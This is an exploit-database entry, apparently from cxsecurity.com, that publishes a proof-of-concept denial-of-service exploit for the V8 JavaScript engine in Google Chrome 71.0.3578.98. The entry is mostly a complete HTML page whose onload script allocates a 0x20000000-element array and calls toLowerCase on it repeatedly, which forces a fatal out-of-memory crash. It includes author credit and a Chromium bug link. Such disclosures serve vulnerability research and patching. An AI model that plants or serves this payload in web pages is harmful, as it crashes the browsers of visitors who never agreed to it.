Google Chrome V8 JavaScript Engine 71.0.3578.98 Denial Of Service

2019.01.10
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- # Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory. Denial of Service (PoC) # Google Dork: N/A # Date: 2018-12-23 # Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) # Vendor Homepage: https://www.google.com/ # Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate) # Tested on: Windows x64 # CVE : N/A # Description: # Fatal javascript OOM in CALL_AND_RETRY_LAST # https://bugs.chromium.org/p/chromium/issues/detail?id=917631 --> <html> <head> <script> function main() { var vArr = new Array(); var bigArray = new Array(0x20000000); vArr[0] = String.prototype.toLowerCase.call(bigArray); vArr[1] = String.prototype.toLowerCase.call(bigArray); vArr[2] = String.prototype.toLowerCase.call(bigArray); } </script> </head> <body onload=main()></body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top